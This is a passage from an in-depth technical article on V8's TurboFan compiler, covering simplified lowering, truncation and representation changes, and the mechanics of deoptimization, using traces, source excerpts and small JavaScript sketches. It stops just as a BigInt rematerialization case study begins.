In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
initial #29: truncate-to-word32
initial #28: no-truncation (but distinguish zeros)
queue #28?: no-truncation (but distinguish zeros)
initial #21: no-value-use


All the inputs (29, 28, 21) are placed in the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)


When visiting node 28, the visitor for SpeculativeNumberModulus decides, in this case, that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
initial #24: truncate-to-word32
initial #23: truncate-to-word32
initial #13: no-value-use
queue #21?: no-value-use


Indeed, if we look at the code of the visitor, it calls VisitWord32TruncatingBinop when two conditions hold. First, both inputs must be typed as Type::Unsigned32OrMinusZeroOrNaN(), which is the case since they are typed as Range(66,66) and Range(2,5). Second, either the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32() (true because the node is typed as Range(0,4)).

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to kWord32, with Type::Any() as the restriction type. It also adds all the remaining inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}
// ...
}

void VisitWord32TruncatingBinop(Node* node) {
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
}

// Helper for binops of the I x I -> O variety.
void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
Type restriction_type = Type::Any()) {
VisitBinop(node, input_use, input_use, output, restriction_type);
}

// Helper for binops of the R x L -> O variety.
void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
MachineRepresentation output,
Type restriction_type = Type::Any()) {
DCHECK_EQ(2, node->op()->ValueInputCount());
ProcessInput(node, 0, left_use);
ProcessInput(node, 1, right_use);
for (int i = 2; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
SetOutput(node, output, restriction_type);
}
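The decision made by the SpeculativeNumberModulus visitor can be sketched in a few lines of JavaScript. This is a simplified model under stated assumptions: types are plain non-negative integer ranges, the -0 and NaN parts of Unsigned32OrMinusZeroOrNaN are ignored, and modulusRange is a rough stand-in for the typer rather than V8's actual typing rule. All function names are hypothetical.

```javascript
// Simplified model: a type is a non-negative integer range { min, max }.
const UINT32_MAX = 2 ** 32 - 1;
const isUnsigned32 = (range) => range.min >= 0 && range.max <= UINT32_MAX;

// Rough result range of lhs % rhs, assuming lhs.min >= 0 and rhs.min > 0.
// This is an approximation for the sketch, not V8's full rule.
function modulusRange(lhs, rhs) {
  return { min: 0, max: Math.min(lhs.max, rhs.max - 1) };
}

// Mirrors the shape of the condition in the visitor:
// BothInputsAre(Unsigned32...) && (IsUsedAsWord32() || node type is Unsigned32).
function lowersToUint32Mod(lhs, rhs, usedAsWord32) {
  const bothInputsUnsigned = isUnsigned32(lhs) && isUnsigned32(rhs);
  const nodeType = modulusRange(lhs, rhs);
  return bothInputsUnsigned && (usedAsWord32 || isUnsigned32(nodeType));
}

const lhs = { min: 66, max: 66 }; // Range(66,66), i.e. 0x42
const rhs = { min: 2, max: 5 };   // Range(2,5), the phi of 2 and 5
console.log(modulusRange(lhs, rhs));             // { min: 0, max: 4 }
console.log(lowersToUint32Mod(lhs, rhs, false)); // true
```

With the ranges from our example, the second half of the condition holds through the node type even though no word32 truncation was propagated to node 28.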


For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
initial #19: no-value-use
initial #17: no-value-use


It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kMerge:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);


The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
visit #23: Phi (trunc: truncate-to-word32)
initial #20: truncate-to-word32
initial #22: truncate-to-word32
queue #21?: no-value-use
visit #13: JSStackCheck (trunc: no-value-use)
initial #12: no-truncation (but distinguish zeros)
initial #14: no-truncation (but distinguish zeros)
initial #6: no-value-use
initial #0: no-value-use


Now let's have a look at the phi visitor. It simply forwards the truncation it received to its value inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
void VisitPhi(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
MachineRepresentation output =
GetOutputInfoForPhi(node, TypeOf(node), truncation);
// Only set the output representation if not running with type
// feedback. (Feedback typing will set the representation.)
SetOutput(node, output);

int values = node->op()->ValueInputCount();
if (lower()) {
// Update the phi operator.
if (output != PhiRepresentationOf(node->op())) {
NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
}
}

// Convert inputs to the output representation of this phi, pass the
// truncation along.
UseInfo input_use(output, truncation);
for (int i = 0; i < node->InputCount(); i++) {
ProcessInput(node, i, i < values ? input_use : UseInfo::None());
}
}


Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
visit #22: NumberConstant (trunc: truncate-to-word32)


They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
double const value = OpParameter<double>(node->op());
int value_as_int;
if (DoubleToSmiInteger(value, &value_as_int)) {
VisitLeaf(node, MachineRepresentation::kTaggedSigned);
if (lower()) {
intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
}
return;
}
VisitLeaf(node, MachineRepresentation::kTagged);
return;
}


We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.
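The walk we just did by hand can be replayed with a small worklist sketch. It is a toy model and not V8 code: the graph is a hand-written subset of our example (nodes 13, 17 and 19 are left out), truncations are reduced to three ordered levels, and the "forward" marker used for the phi is a convention invented for this example.

```javascript
// Toy backward propagation of truncations. The three-level ordering is a
// simplification of the real truncation lattice.
const RANK = {
  "no-value-use": 0,
  "truncate-to-word32": 1,
  "no-truncation": 2,
};

// id -> { op, uses: [[inputId, truncation requested for that input], ...] }
// "forward" means: pass along whatever truncation this node received (Phi).
const graph = {
  31: { op: "End", uses: [[30, "no-value-use"]] },
  30: { op: "Return", uses: [[29, "truncate-to-word32"], [28, "no-truncation"], [21, "no-value-use"]] },
  29: { op: "NumberConstant", uses: [] },
  28: { op: "SpeculativeNumberModulus", uses: [[24, "truncate-to-word32"], [23, "truncate-to-word32"], [21, "no-value-use"]] },
  24: { op: "NumberConstant", uses: [] },
  23: { op: "Phi", uses: [[20, "forward"], [22, "forward"], [21, "no-value-use"]] },
  21: { op: "Merge", uses: [] },
  20: { op: "NumberConstant", uses: [] },
  22: { op: "NumberConstant", uses: [] },
};

function propagateTruncations(nodes, endId) {
  const truncation = new Map([[endId, "no-value-use"]]);
  const queue = [endId];
  const queued = new Set(queue);
  const visitOrder = [];

  while (queue.length > 0) {
    const id = queue.shift();
    queued.delete(id);
    visitOrder.push(id);
    for (const [input, requested] of nodes[id].uses) {
      const use = requested === "forward" ? truncation.get(id) : requested;
      const previous = truncation.get(input);
      // (Re)visit an input when it is new or when more bits are now needed.
      if (previous === undefined || RANK[use] > RANK[previous]) {
        truncation.set(input, use);
        if (!queued.has(input)) {
          queue.push(input);
          queued.add(input);
        }
      }
    }
  }
  return { truncation, visitOrder };
}

const { truncation, visitOrder } = propagateTruncations(graph, 31);
console.log(visitOrder.join(" ")); // 31 30 29 28 21 24 23 20 22
console.log(truncation.get(20));   // truncate-to-word32
```

The visit order matches the order of the visit lines in the trace above (minus the nodes that were left out), and the word32 truncation requested by the modulus reaches the phi's constant inputs.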

Please note that a visitor may behave differently according to the phase that is currently being executed.

  bool lower() const { return phase_ == LOWER; }
bool retype() const { return phase_ == RETYPE; }
bool propagate() const { return phase_ == PROPAGATE; }


That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

Retyping

There isn't much to say about the retyping phase. Starting from the End node, every node of the graph is put on a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and nodes are revisited. This forward-propagates updated type information (starting from Start, not End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed :

 visit #29: NumberConstant
==> output kRepTaggedSigned


For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
visit #23: Phi
==> output kRepWord32

#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
visit #28: SpeculativeNumberModulus
==> output kRepWord32


Lowering and inserting conversions

Now that every node has been associated with use information for every input as well as an output representation, the last phase consists of:

• lowering the node itself to a more specific one (via a DeferReplacement for instance)
• converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's go through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant #29 has a kRepTaggedSigned representation. However, because it is used as the first input of the Return node, the Return node wants it to be truncated to word32. Therefore, the node gets converted. This is done by the ConvertInput function, which itself calls the representation changer via GetRepresentationFor. Because a truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor, which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
return jsgraph()->Int32Constant(DoubleToInt32(value));
}
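To get a feel for what truncating a double constant to an int32 means, the same conversion can be observed from JavaScript. The sketch below assumes that DoubleToInt32 follows the ECMAScript ToInt32 semantics, which is what the bitwise OR operator applies to its operands. The toInt32 helper is a name made up for the example.

```javascript
// ECMAScript ToInt32: truncate toward zero, then wrap modulo 2^32 into the
// signed 32-bit range. The bitwise OR with 0 applies exactly that conversion.
const toInt32 = (value) => value | 0;

console.log(toInt32(0x42));        // 66
console.log(toInt32(2 ** 32 + 5)); // 5
console.log(toInt32(-1.9));        // -1
console.log(toInt32(NaN));         // 0
```

For small integer constants such as the ones in our graph, the truncation is lossless, which is why replacing the NumberConstant by an Int32Constant is safe here.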


visit #30: Return
change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32


For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
else if (IsWord(output_rep)) {
if (output_type.Is(Type::Signed31())) {
op = simplified()->ChangeInt31ToTaggedSigned();
}


visit #30: Return
change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)


The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi


If we compare the graph (well, a subset), we can observe :

• the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
• the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
• node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the green rectangle

This is before simplified lowering :

This is after :

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
Uint32BinopMatcher m(node);
Node* const minus_one = jsgraph()->Int32Constant(-1);
Node* const zero = jsgraph()->Uint32Constant(0);
Node* const lhs = m.left().node();
Node* const rhs = m.right().node();

if (m.right().Is(0)) {
return zero;
} else if (m.right().HasValue()) {
return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
}

// General case for unsigned integer modulus, with optimization for (unknown)
// power of 2 right hand side.
//
//   if rhs == 0 then
//     zero
//   else
//     msk = rhs - 1
//     if rhs & msk != 0 then
//       lhs % rhs
//     else
//       lhs & msk
//
// Note: We do not use the Diamond helper class here, because it really hurts
// readability with nested diamonds.
const Operator* const merge_op = common()->Merge(2);
const Operator* const phi_op =
common()->Phi(MachineRepresentation::kWord32, 2);

Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
graph()->start());

Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
Node* true0 = zero;

Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
Node* false0;
{
Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
}

Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
return graph()->NewNode(phi_op, true0, false0, merge0);
}
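The pseudocode in the comment of SimplifiedLowering::Uint32Mod translates directly to plain JavaScript. This is a sketch of the arithmetic only, not of the graph construction, and the uint32Mod name is made up for the example. The >>> 0 conversions are there to stay in unsigned 32-bit arithmetic.

```javascript
// Value-level version of the lowered modulus:
//   rhs == 0        -> 0
//   rhs power of 2  -> lhs & (rhs - 1)
//   otherwise       -> lhs % rhs
function uint32Mod(lhs, rhs) {
  lhs >>>= 0;
  rhs >>>= 0;
  if (rhs === 0) return 0;
  const msk = (rhs - 1) >>> 0;
  if ((rhs & msk) !== 0) return lhs % rhs; // not a power of two
  return (lhs & msk) >>> 0;                // power of two: mask instead
}

console.log(uint32Mod(0x42, 2)); // 0, what f(true) computes
console.log(uint32Mod(0x42, 5)); // 1, what f(false) computes
console.log(uint32Mod(0x42, 0)); // 0
```

Both results fall inside Range(0, 4), the static type computed for node 28.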


A high level overview of deoptimization

Understanding deoptimization requires studying several components of V8:

• instruction selection
  • when descriptors for FrameState and StateValues nodes are built
• code generation
  • when deoptimization input data are built (that includes a Translation)
• the deoptimizer
  • at runtime, this is where execution is redirected to when "bailing out to deoptimization"
  • uses the Translation
  • translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kinds of nodes related to deoptimization, such as:

• Checkpoint
  • refers to a FrameState
• FrameState
  • refers to a position and a state, takes StateValues as inputs
• StateValues
  • state of parameters, local variables, accumulator
• Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization:

• eager, when you deoptimize the current function on the spot
  • you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
• lazy, you deoptimize later
  • another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
• soft
  • a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that JavaScript first gets translated to ignition bytecode (and a feedback vector is associated with that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data with this optimized code. When executing optimized code, if an assumption is violated (a type guard failing, for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer uses the deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, the deoptimizer returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
let obj = {};
obj[x] = 42;
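}

%PrepareFunctionForOptimization(add_prop);
add_prop("x");
add_prop("x");
%OptimizeFunctionOnNextCall(add_prop);
add_prop("x");
add_prop("different");
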

Now run it using --turbo-profiling and --print-code-verbose.

This lets us dump the deoptimization input data:

Deoptimization Input Data (deopt points = 5)
index  bytecode-offset    pc  commands
0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
STACK_SLOT {input=-1}
STACK_SLOT {input=4}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rcx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


We also see the code used to bail out to deoptimization (notice that the deopt index matches the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason '(unknown)'
;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason 'wrong name'
;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop


Interestingly (you'll also need to add the --code-comments flag), we can notice that a native TurboFan-compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
-- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10


Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
;;; deoptimize at <test.js:3:8>, wrong name
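The speculation behind this "wrong name" bailout can be mimicked in plain JavaScript. This is only an analogy and not how TurboFan generates code: makeAddProp, the fast path and the deopt counter are all invented for the example, and the "bailout" is just a call to a generic slow path.

```javascript
// Toy speculation: the "optimized" version assumes the property name seen in
// the feedback and falls back to a generic path when the guard fails.
function makeAddProp(expectedName) {
  let deoptCount = 0;

  // Generic path: works for any property name.
  const generic = (name) => {
    const obj = {};
    obj[name] = 42;
    return obj;
  };

  // Speculative path: guarded by a check on the name.
  const optimized = (name) => {
    if (name !== expectedName) { // guard, analogous to "wrong name"
      deoptCount++;
      return generic(name);      // bail out to the slow path
    }
    return { [expectedName]: 42 };
  };

  return { call: optimized, deopts: () => deoptCount };
}

const addProp = makeAddProp("x");
addProp.call("x");
addProp.call("different");
console.log(addProp.deopts()); // 1
```

The important point is that the result is the same on both paths. Only the route taken to compute it changes when the assumption is violated.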


It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
4: captured object #0 (length = 7)
0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
5: 0x002a00000000 ; (literal  6) 42


The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rdx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}
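One way to picture how such a translation is consumed is a tiny command interpreter. The sketch below is a toy model: the command names mirror the dump above, but the translate function, the shape of the input frame and the placeholder values are assumptions, and CAPTURED_OBJECT is deliberately left out.

```javascript
// Toy translation interpreter: each command says where to fetch one value
// of the output frame (a stack slot, a register or a literal).
function translate(commands, input) {
  return commands.map((cmd) => {
    switch (cmd.kind) {
      case "STACK_SLOT":
        return input.stack[cmd.input];
      case "REGISTER":
        return input.registers[cmd.input];
      case "LITERAL":
        return input.literals[cmd.literalId];
      default:
        throw new Error(`unsupported command ${cmd.kind}`);
    }
  });
}

// Made-up input frame, loosely modelled on the dump above.
const inputFrame = {
  stack: { 3: "<JSFunction add_prop>", "-2": "<JSGlobal Object>", 4: "<NativeContext>" },
  registers: { rdx: "different" },
  literals: { 6: 42 },
};

const outputValues = translate(
  [
    { kind: "STACK_SLOT", input: 3 },
    { kind: "STACK_SLOT", input: -2 },
    { kind: "REGISTER", input: "rdx" },
    { kind: "STACK_SLOT", input: 4 },
    { kind: "LITERAL", literalId: 6 },
  ],
  inputFrame
);
console.log(outputValues);
```

The values come out in command order, which is the order in which the deoptimizer lists them as inputs #0, #1, #2 and so on.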


And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
-------------------------
0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
-------------------------
0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)
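The raw words in this dump also show how small integers are encoded: 0x002a00000000 is displayed as Smi 42 and 0x003b00000000 as Smi 59. That is consistent with a payload stored in the upper 32 bits of the word, which is what the sketch below assumes (a 64-bit build without pointer compression). The helper names are made up and only non-negative values are handled.

```javascript
// Assumption: 64-bit words where a Smi keeps its payload in the upper 32 bits.
const SMI_SHIFT = 32n;

const smiTag = (value) => BigInt(value) << SMI_SHIFT;
const smiUntag = (word) => Number(word >> SMI_SHIFT);
const toHex = (word) => "0x" + word.toString(16).padStart(12, "0");

console.log(toHex(smiTag(42)));        // 0x002a00000000
console.log(smiUntag(0x003b00000000n)); // 59
```

BigInt is used here because the tagged words do not fit in 32-bit integer arithmetic.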


After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>


Case study : an incorrect BigInt rematerialization

Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs:

1. parameters
   • UseInfo is AnyTagged
2. registers
   • UseInfo is AnyTagged
3. the accumulator
   • UseInfo is Any
4. a context
   • UseInfo is AnyTagged
5. a closure
   • UseInfo is AnyTagged
6. the outer frame state
   • UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
DCHECK_EQ(5, node->op()->ValueInputCount());
DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
if (propagate()) {
EnqueueInput(node, 2, UseInfo::Any());
} else if (lower()) {
Zone* zone = jsgraph_->zone();
Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
} else {
ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));

node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
types, SparseInputMask::Dense()),
accumulator));
}
}

ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
return SetOutput(node, MachineRepresentation::kTagged);
}


An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node.

static UseInfo AnyTagged() {
return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
}
// Undetermined representation.
static UseInfo Any() {
return UseInfo(MachineRepresentation::kNone, Truncation::Any());
}
// Value not used.
static UseInfo None() {
return UseInfo(MachineRepresentation::kNone, Truncation::None());
}

const char* Truncation::description() const {
switch (kind()) {
case TruncationKind::kNone:
return "no-value-use";
// ...
case TruncationKind::kAny:
switch (identify_zeros()) {
